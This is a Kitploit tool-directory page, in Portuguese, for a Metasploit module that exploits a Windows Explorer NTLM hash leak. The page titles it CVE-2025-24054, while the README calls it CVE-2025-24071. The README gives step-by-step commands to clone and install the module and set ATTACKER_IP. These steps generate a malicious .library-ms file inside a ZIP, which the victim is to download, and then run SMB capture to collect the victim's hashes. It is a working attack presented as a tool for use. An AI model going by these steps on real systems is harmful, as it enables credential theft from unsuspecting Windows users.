Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/fomovet/cve-2025-24054
Frameworks de Testes de PenetraçãoFrameworks de ExploraçãoGeração de PayloadsAnálise de VulnerabilidadesExploraçãoComando e Controle
GitHubfomovet/cve-2025-24054

cve-2025-24054

Prova de conceito para CVE-2025-24054

Ver Repositório
2há 2 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-24071: Vazamento de Hash NTLM via Arquivo .library-ms (Módulo Metasploit)

Este repositório contém um módulo Metasploit para explorar o CVE-2025-24071, uma vulnerabilidade no Windows Explorer que vaza hashes NTLM quando um arquivo .library-ms malicioso é extraído de um arquivo ZIP.

Desenvolvido por: FOLKS-IWD


Visão Geral

A vulnerabilidade ocorre quando um usuário extrai um arquivo ZIP contendo um arquivo .library-ms especialmente criado. O Windows Explorer inicia automaticamente uma solicitação de autenticação SMB para um servidor remoto especificado no arquivo, vazando o hash NTLM do usuário sem qualquer interação.

Este módulo Metasploit:

  1. Gera um arquivo .library-ms malicioso.
  2. Compacta-o em um arquivo ZIP.
  3. Integra-se à funcionalidade de captura SMB do Metasploit para coletar hashes NTLM. image

Instalação

  1. Clone o repositório:
    root@kitploit:~
Baixar ferramenta
git clone https://github.com/FOLKS-IWD/CVE-2025-24071-msfvenom.git cd CVE-2025-24071-msfvenom
  • Copie o módulo para o diretório de módulos do seu Metasploit:
    root@kitploit:~
    cp ntlm_hash_leak.rb ~/.msf4/modules/auxiliary/server/
    
  • Uso

    1. Carregue o módulo:
      root@kitploit:~
      use auxiliary/server/ntlm_hash_leak
      
    2. Defina as opções necessárias:
      root@kitploit:~
      set ATTACKER_IP 192.168.1.162  # Substitua pelo seu endereço IP
      set FILENAME exploit.zip       # Nome do arquivo ZIP malicioso
      set LIBRARY_NAME malicious.library-ms  # Nome do arquivo .library-ms
      set SHARE_NAME shared          # Nome do compartilhamento SMB
      
    3. Execute o módulo:
    root@kitploit:~
      run
    
    1. O módulo gerará um arquivo ZIP malicioso (exploit.zip). Hospede este arquivo para a vítima baixar e extrair.
    2. Use o módulo de captura SMB do Metasploit para coletar os hashes NTLM:
      root@kitploit:~
      use auxiliary/server/capture/smb
      set SRVHOST 192.168.1.162  # Mesmo que ATTACKER_IP
      run